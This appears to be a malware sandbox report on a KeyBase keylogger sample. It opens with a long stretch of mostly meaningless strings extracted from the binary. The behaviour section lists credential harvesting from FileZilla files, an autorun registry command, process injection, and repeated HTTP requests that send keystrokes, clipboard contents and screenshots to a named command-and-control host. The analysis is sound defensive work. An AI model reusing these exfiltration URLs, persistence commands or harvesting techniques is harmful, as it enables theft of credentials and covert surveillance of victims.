PT:Y
^@{.6
Mnf[
s^H8j
N^-2
L"c0
wwwwq
$Pju
i:X
L$o[
B(m)!`
@Ld0
b.
aDc~
g&cs
+xEp+
&Hj
Lm,$
|Foa]
V |*!
L6D>t
s;53
U mCT
+VFF@?9
Twdw5
wN&+
|<8?
Q ef
e"W$G
String
68$=_eTpX
_CorExeMain
Wv!to/,
#+h{
#7(}s
,YRK*_x
)@r1
"msa4&;QCh
` wa
i5sl2
CBH<
LQHFOOPpEgA3Hf
7>!`
PropertyInfo
@@dd
1K1y
3+p,
` &C
o5#9
,!Ik
\'[\p#
'9O
Y$XY
QcBi
\tSLS tW
/s>a
`k%c
:0)p
+V!;
1UzK
@}Z8
X2{^f
dY4E
7Plnc
Rdp*Je
9!>"
Upc
Mc1hfdh
'3LS
cf6Y
|$nF
TG=4#
sN)`
1M3
E <)
mQ9S::
ky<x
,R*W
:t,N
]Hls
8%qt
>Fc2
4}pI
,+a6
C;.%
gWou9(
O^Nr w
*my;
EFCiBCA\222J
UV/0
e M(
)Sl~N
uQM`
!TEv
v sN[
c!.2
#"WM_
ErUF
cPL>
Wh8?_
DA~l
,so<
V,iwN
"?af!
{nrt
Ghc(
r0lIN
!9>=
Hxb{
=F ~" ()
gVt(
Ri,;W8&
iS;r
K@I
+ {5I
s Rl
.qjfe
n@G9|o
>NJ_
Y9 O
[C*L
Vy!)
MNGr4gzzul9bskZQqaR
dU$PR
/k*_b
(? cC
aYe#'q|1
IcLA
\F_qw
jjQ^
W/Nd
0_
pk+8
v8T>
lK$` C
_\ 0gA
t(t9Kc
*UL#
5-ZMr?j
y:_E
3T]0
=qT ,
C] Y
N<NNNJNYN
g 8~
E1.k
<D.C
u{zP
-dTn
D5%
/(\:Yw
fr e}6
fr9P^
Q 42
R{QOm
VIjU
N4SeL
9[y2k
Kq:,
[XrG
nA>*[
`}F38
L Hl=
u6r2k
n)W$08
FXdk
X37T
J]r.8o
"M"l
QjCsYb0
Vr_Ew
9o`O
[_mSE
&M60
/J=@{
b2 Ry
Iwayar
1fnv
# F[
ug-.
D;ue\
MJ2x/:|
#'.
Object
:TZ5
u^%S^1;
F&]SR
wmxQ
w_4>
1FQ2
jimB
`Cc&
6^wV ^@
VVVz
*I5W{
JCfD
}@`_
-8D,]go
R$E
"21{
0KHk)h
F`s1
g4(
O$8LJ
\S @& :
_EZ`d
CegI
e:@Ls
m!C1
FHrW
%Vo
vF?T
|fCq
jfGG
O~DHI
cxFof
1$h{i
9:'v"
X+)~
P8xNt
E$b-
E@:o
z'rx
a7,~
Un<irw
Q %9~
NbNVNYN!N}NqNHNuNgN2N_NXN,N:NLNLN}N%NRN2NfNpN9NJN8NnNeN
Mg&~
;xm4
{X2g2
:2|+(
8H<H
kk$P
N NGNCN
YUtJY
e8u
UTa|{+
gq!b
N5NpNFN
ps\
V=pG
e~]'
'CV3
E\Z@
VQws
NbN*N
*B@k|Jl<
^'u8
>3)n
VjLe
<LGv
Fvq0p
@T1!
!?x
ob6>
15Vd
P7xM
kvY=
[|CZ
Q.IJ
bJ/S
3
`:[@a
||:8
\n)k
tm#
=| f
V2 q
&7Z\
IR %
AiSm
wcQ0
\i_L
S ?E
I,`=
>xnU
4f8~
v%N.
}G0QHW
`pQ&
|1;a1
du}#
^7h
1-Cc
ztZ7
?@=J
1s&G
~Juq
Q-O[
| yWMi}eGt
P 3!
!1C5
oQ:A
/y.8>
xKp}
p9{7
m?x@
F8NKNMN\N
qfNsjKa
oAme
;hmV#
isZ.j
^l-91
3HG.
yYgxaZqNGIoOyV40MvI
zr7&
?b& &
qBO#
<\,/)
qc@'[
&$"^
a2!S
W{>m
G@ZW
ktUi
<^:y
048
<?,U
altzl
O;s
fMkJH
NNN:N/N*N
B>y8Z{>
\NMfUC,
$Vg.
p}oKTp
?-#S
$m$o
P{&vJ
1; ?
@O*9
Y"&<%X
N NbN
Jj[1#
j,@'=
4gt4
O y
d,4Z
fi$m
x |;
rdm^O
O2pt
wF&e
System.Threading
C<#TH.
V#ixV
/h;Zd
&"rr
(ci"
U\{j
hL[)
Q[X{
(^"`x?
c5C#
s'94o 3
K5;c
#@`2
{Q7*
2t:9
h:De
=^L
aI1X
9YB
d|iQ}
PyW!t
efJTK
IPh O
0+GR@TyTu
01~S
i(q>6
NNNeN
2@BG
; cyl
ti=t
*[3GlS
H&U@
5h+c
iaahoSc
p\%lZ
vNpK
;]s4
j=<w_k
aTO
) E]
-l x
AV~ub"
*\kH
-dYx
7U@F
4::rH
>Z|b<(
gd=W
Ixiu
%R#Z
:%X?rm
4}eU
q-!,nH
=\.N
_lzv
8}q@5
{!x4d5k
T5XU
jdVU
l>B`s
Sh>iM(
%5"
1w 5
HzPF
&=:*)
ixkK$
>tX
=*UY2
?3')@
E8k\
m2!b>
i1{\
0.<n
p Oc
D) M
)jkwF
n=".
q.=Ra
,$?2
uL7i
Ew"R
`.rsrc
><C;
&{g GZ:g
_n^C
M-hu
z1 %
qAKO
&'r2
Kz.
yY*hJ
f_Ci
v?UGEoV
Sl+I=
qBw`
t^ R
e"u R
Pn]h
(s =
~)Wr
ZR $
_ui
uu2IO5G1IpMeuWoSE
; Js
nwnSOLKJH>8
G1Pz
]JC6
F9 "
YRI;
MOD
aW]#
$2CCAp,
|d;;
@uQO
`E]dqP
]H|t4 gj
s}08
@2K|
JQNNQTchmnmjfY.
:=!^
^4bI
0j>y&
v2.0.50727
ATz&(
&K5c
wjLf
LDw
;t*lTn
(Yh&R
:P +
= %$
y>A*
U)KJ
pIU
zn84
s?Il
x_u)
L v.m
<<4"
hqYf
~.Kp\
~6`"
5t@l
Z`#S
Y.$
G[oy
)x-a
o6LH
"T{A
%# V'P
NtNVNiNDN
<3]f_a
5 vd
qg+q
H=}
u y{
z8Sd
gd2ZGv
oY)m
kS!x
4<5
d~ & E
_})$
E '
hn+Y
tf6p
Tfi[
yF::I
S.u|i
4&}5T
o[ DQ
nMQu
S3a:
s i
(w )
chlY
jRc w
T]1!
6;;m%
A0L`
oF_b
}Y:I
[9k"
P; X
O?QF@
BM~]yC
dr,
D$bp"
'UID
{z>Y*
@[>,%
dsW
p#Y2
h/b6
GS#F2^,
c_WQ
+ +av
G}jpX
9Iri
A .4>;B
P"84
\ b :
8byn
b-]P
*!hLMy
MS,2
b4W6
6 mh
+hc
|;W`
Qx/C
pP!{2F
vFp!
MPw F
m#bZ
kfC'u}
GeYf
T%1MN
y0Rkw
c}=:U
q2vG
j= p
r0$8
w+G=T
QSY/
fdNE!
r^r0
"JQ0
]ua:
?R_
6b S+
H`9`
GP 0
/8:m
lj"a
nz"[<
B]1L
Jsr{
(9J:
V#r
\.lj
d5:~
IyZw
NhN!NaNKN
xf0d
htPE
) >t
scP
e/~
f0j;
6<?Z^
arYL
y.P6s
*]yB+
WpbJ
A =o&=|{
>!>u
^qpQ}
00M;_'
oG7I
._V4
System.Runtime.CompilerServices
18N':>
cZuGT
- K`
nGh5
qX ]
)+U>
E0{#f[i
O8:l
yT&x
,
n3;G
^~S[O
?O]>d
q~ b
d`B
$I~4
.V2 0
Yv :
YM:/J
Rt fH
N+*3
ud}o
,$uj
OJxp
@`.z
O\$N}\
^%q9
C`i)
\0I4+6
Microsoft.VisualBasic
k`&+
u ?h
G&Gq
74m F
z K0&
(_X:
TSHv
E)F&
)x[M
DI9N@
6n_0
r 8,
8<dF
2{Vx
p"Zp
?&i}
]R7(x|
b=\,n0`>
St^a
f$}B&h&
!!!k
cs9sdeZvNlYJoziXc
}kWQ
PcP`
[Z !
2J5A
NeNxNkN}NtN&N<N(N NvNaNfN
LJv/
! "h
l{o]
GcDH
t7X1
$Ff4
NLN}NBN
y\c<$2"W
*`&[
V/K%
bUcrX
uR78
3T,5
5ZE" "
Do;+
=*?&
RYWW|<
;(:7
N6NnN2N
a)kObS
u*C
yWGp
|QygZ
^n[R*+s
D{G]L
&a+K
N;N(N_N~NWNRNoNoN:NHN
Q2<Y
1&XR
fXx`
NbUuv
CiT>KI
Sap'
21}mN9
3#qI
s,:tF
$AH<
_ 't
jeAi
i'Gc
Mc\k
99:p
_=qb@|
543z
LM O
,L U
QMZ
9=2`
Nr_y
=g8jF
R1q(
;5i7L
0'A.N
SI [
|+ d
_HUj
*5j4
***S
\! U
EaAq#
Cq2y9
[= @
Ag<)
92s.V[#
?# ^
K.T3cz
v,
rM\"`
7]P+
.%M_t
Q>??
QOl{
q 9+
g_)cJ
A]*T
h.)@
4pU>
sch]
:{\1C
X2eu
c,e `f
s>qUW
>x3dh
wa9F
M9<i
*aq!
7YMzR
PSA18
1l%z;
G\*>
*0r!
Ryu1
lLzP
3AQBM
Ci 8
NsN(N
\II\gnruwwtD)
\_?[
&aQ{
aZt
U|2e
o_6V
=tg
*U/)
9Wz 'e
ob'e2\!Swhy
6X_O
[lIH
>;3N
SQ(/
aoVO
j u_
Qk5W
kzDG
Ql29
zB4+G
`RT\
LC@-
/[fH^
93K]E
'ej4 Q
((&E
Anvnw
Thread
=ABb
9/+:
((&T
Sz#,
O&P
4<s!
fQO9E
zNqB4
g7jn
r9`d
/} `i
s }f
v'{yE
pO>]
`t)
gI3#
hyNP
J>_M
-\ @5
| UJ
&TL?2
a<~T
l-oB
f0G|
sb}&?
bZ012
m2'n
0"_A;\
8m8f
@=J:
H=p}/
#,[3
#+?b
N+;#
R}6F]
\7Ss
.D_
Z,6V
y aJ
o4q~
[h-c
cdNNNORTYZYDC=
-
4Ee6
+5UUIU
H4j5
lpUU
D I*
o+8g/
LUtoO
YxIX
k4*]
:_$70RL
gj@!+
y)%}
o2uN
39&5
Bihe
E:&x
cq3y
U^ P
&' |
,\[; C
#,8D
o Sp
Dz&o
F{j+&
\ca&
)7d4
>tif9
fx~CX
KH.E
@r~r,
e]a\
%Zpv
kRIQ
=@ps
KZkl(
R3B i
[a D\{.
K#,h
mscoree.dll
#,I7
,xi1
0-4?|
Z5=D
K=)F0
& i_
9:6a---I
5NK[
:VEK
>'t^
> 9$
k) d
BnBzp
|Ax:Q
opU}
rs:cn
}1S^m$Y
rnA3
h9'e
X'6z
d\#L
([z
Gcw8
5PJP_H
f/^$V{
3% S
VmA3.
#]u\
{Q9j
}KS
<!?.
V q_
uEU9
6# [!
?_c8N
O9a<
,({I
u_|a63L
-OxP
at^k
/WQa
@_$D3
O(3
?92leN
MUgW
};`J
9PM5
.cctor
4<BHCCi*
L%NAN N?NZN
-UM<
yECP
CxY
yc@X
G)ru}
\%KZ
40
VG|#6
)
PS!<
?+J}
bfl"
N{NNNoN=N/N N
[N G
h-t
Q(H~
.SmE
$N3J6
5+H.23
q=P6
^a.'
dB!:
{c9PiW
pa8]W
!!!i
lf(&
kejZ.m
<*
LateSet
*dE+
6PG"
g_(V.
N;N&N{N)N,NrN
d0,o
NR3N
j[Uw
@e!3
v: `/
#],0
DX)>s0
Lv{q
xX30C/
Sleep
%1X
(+ 6
VZmA
0Z=gX
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven02_64 | Seven02_64 | VirtualBox | 2018-02-22 00:02:30 | 2018-02-22 00:05:21 | 171 |
14 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN KeyBase Keylogger HTTP Pattern
- signature: ET TROJAN KeyBase Keylogger Uploading Screenshots
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content ".php" (Soc-Rule)
Harvests information related to installed instant messenger clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\IMVU\username
- key: HKEY_CURRENT_USER\Software\Paltalk
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
Creates a copy of itself
Severity: High
Confidence: Very High
- copy: C:\Users\Seven01\Desktop\PSAA1.exe
Installs itself for autorun at Windows startup
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PSA
- data: cmd /c type C:\Users\Seven01\AppData\Local\Temp\PSA.txt | cmd
A process attempted to delay the analysis task by a long amount of time.
Severity: High
Confidence: Very High
- Process: PSAA1.exe tried to sleep 45019 seconds, actually delayed analysis time by 0 seconds
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: PSAA1.exe(2620) -> PSAA1.exe(2900)
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.99, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00034000, virtual_size: 0x00033fc4
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://settings.platinumistabul.com/keybase/post.php?type=clipboard&machinename=SEVEN02-PC&windowtitle=&clipboardtext=nepituorarcesrnreidmshaspnhdmilfriesets%20twreiaar%20togyddohacgotmcotu%20moebofyaohpp%20olr%20tieasdho%20ptletbsoi%20oegdcelfgdocslhseooarai%20fteh%20pi%20ddsh%20ldreim%20oeb%20eo%20trheotyeal%20etuhrihdl%20%20hishewimsdlefd%20utpaneeeiaildeihdih%20%20hien%20ninagrerearoondpdaeepc%20aheomhmgeoacu%20tahnoe%20uhooetpnsruelitiowle%20eehiehlhreiweeeecatetidreealilwiii%20tdoagbstehnrtogoe%20oeanhoclntihhourre%20gimo%20mot%20ogrlawlachbtrahfo%20%20seytcedsdpstta%20rllrn%20c%20olitgu%20hyaiowmnewnelhstwdmliliu%20wdngoityhghuoohrisfi%20pebdroddnnhnahahns%20ytalbhrabalddtngautoaibndntudeldh%20gthdaon%20eoeosusraaeawdg%20dmoyathmt%20%20aehdr%20gresetie%20a&machinetime=3.04
- url: http://settings.platinumistabul.com/keybase/image/upload.php
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=4.22
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=4.43
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=5.43
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Start&keystrokestyped=&machinetime=7.23
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=7.23
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=9.04
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=9.04
- url: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=17.33
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- post_no_useragent: HTTP traffic contains a POST request with no user-agent header
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=clipboard&machinename=SEVEN02-PC&windowtitle=&clipboardtext=nepituorarcesrnreidmshaspnhdmilfriesets%20twreiaar%20togyddohacgotmcotu%20moebofyaohpp%20olr%20tieasdho%20ptletbsoi%20oegdcelfgdocslhseooarai%20fteh%20pi%20ddsh%20ldreim%20oeb%20eo%20trheotyeal%20etuhrihdl%20%20hishewimsdlefd%20utpaneeeiaildeihdih%20%20hien%20ninagrerearoondpdaeepc%20aheomhmgeoacu%20tahnoe%20uhooetpnsruelitiowle%20eehiehlhreiweeeecatetidreealilwiii%20tdoagbstehnrtogoe%20oeanhoclntihhourre%20gimo%20mot%20ogrlawlachbtrahfo%20%20seytcedsdpstta%20rllrn%20c%20olitgu%20hyaiowmnewnelhstwdmliliu%20wdngoityhghuoohrisfi%20pebdroddnnhnahahns%20ytalbhrabalddtngautoaibndntudeldh%20gthdaon%20eoeosusraaeawdg%20dmoyathmt%20%20aehdr%20gresetie%20a&machinetime=3.04
- suspicious_request: http://settings.platinumistabul.com/keybase/image/upload.php
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=4.22
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=4.43
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=5.43
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Start&keystrokestyped=&machinetime=7.23
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=7.23
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=9.04
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=Program%20Manager&keystrokestyped=&machinetime=9.04
- suspicious_request: http://settings.platinumistabul.com/keybase/post.php?type=keystrokes&machinename=SEVEN02-PC&windowtitle=&keystrokestyped=&machinetime=17.33
Drops a binary and executes it
Severity: Medium
Confidence: Medium
- binary: C:\Users\Seven01\Desktop\PSAA1.exe
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: PSA18.exe -> "cmd"
- Process: PSAA1.exe -> "cmd"
Creates RWX memory
Severity: Medium
Confidence: Medium
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven02_64 | Seven02_64 | VirtualBox | 2018-02-22 00:02:30 | 2018-02-22 00:05:21 | 171 |
10 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\PSA18.exe.config C:\Users\Seven01\AppData\Local\Temp\PSA18.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\PSA18.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\PSA18.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol21.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Users\Seven01\AppData\Local\Temp\it-IT\PSA18.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\PSA18.resources\PSA18.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\PSA18.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\PSA18.resources\PSA18.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Users\Seven01\AppData\Local\Temp\it\PSA18.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\PSA18.resources\PSA18.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\PSA18.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\PSA18.resources\PSA18.resources.exe C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll C:\Users\Seven01\Desktop C:\Users\Seven01\Desktop\PSAA1.exe \Device\NamedPipe\ C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2288.10840953 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2288.10840953 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2288.10840984 C:\Windows\System32\Branding\Basebrd\Basebrd.dll C:\Windows\Branding\Basebrd\basebrd.dll C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\Desktop\PSAA1.exe" C:\Users\Seven01\Desktop\PSAA1.exe.config C:\Users\Seven01\Desktop\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\Desktop\PSAA1.exe.Local\ C:\Users\Seven01\Desktop\PSAA1.INI C:\Users\Seven01\Desktop\it-IT\PSA18.resources.dll C:\Users\Seven01\Desktop\it-IT\PSA18.resources\PSA18.resources.dll C:\Users\Seven01\Desktop\it-IT\PSA18.resources.exe C:\Users\Seven01\Desktop\it-IT\PSA18.resources\PSA18.resources.exe C:\Users\Seven01\Desktop\it\PSA18.resources.dll C:\Users\Seven01\Desktop\it\PSA18.resources\PSA18.resources.dll C:\Users\Seven01\Desktop\it\PSA18.resources.exe C:\Users\Seven01\Desktop\it\PSA18.resources\PSA18.resources.exe C:\Users\Seven01\Desktop\it-IT\mscorlib.resources.dll C:\Users\Seven01\Desktop\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\Desktop\it-IT\mscorlib.resources.exe C:\Users\Seven01\Desktop\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Users\Seven01\Desktop\RunPEDll.dll C:\Users\Seven01\Desktop\RunPEDll\RunPEDll.dll C:\Users\Seven01\Desktop\RunPEDll.exe C:\Users\Seven01\Desktop\RunPEDll\RunPEDll.exe C:\Users\Seven01\Desktop\it-IT\stub.resources.dll C:\Users\Seven01\Desktop\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\Desktop\it-IT\stub.resources.exe C:\Users\Seven01\Desktop\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\Desktop\it\stub.resources.dll C:\Users\Seven01\Desktop\it\stub.resources\stub.resources.dll C:\Users\Seven01\Desktop\it\stub.resources.exe C:\Users\Seven01\Desktop\it\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\PSA.txt C:\Users\Seven01\Desktop\it-IT\k843834je.resources.dll C:\Users\Seven01\Desktop\it-IT\k843834je.resources\k843834je.resources.dll C:\Users\Seven01\Desktop\it-IT\k843834je.resources.exe C:\Users\Seven01\Desktop\it-IT\k843834je.resources\k843834je.resources.exe C:\Users\Seven01\Desktop\it\k843834je.resources.dll C:\Users\Seven01\Desktop\it\k843834je.resources\k843834je.resources.dll C:\Users\Seven01\Desktop\it\k843834je.resources.exe C:\Users\Seven01\Desktop\it\k843834je.resources\k843834je.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2620.10842828 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2620.10842828 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2620.10842828 C:\Users\Seven01\AppData\Local\Temp\reg.* C:\Users\Seven01\AppData\Local\Temp\reg C:\ProgramData\Oracle\Java\javapath\reg.* C:\ProgramData\Oracle\Java\javapath\reg C:\Windows\System32\reg.* C:\Windows\System32\reg.COM C:\Windows\System32\reg.exe C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\ProgramData\Mails.txt C:\ProgramData\Browsers.txt C:\Windows\System32\tzres.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\Gdiplus.dll 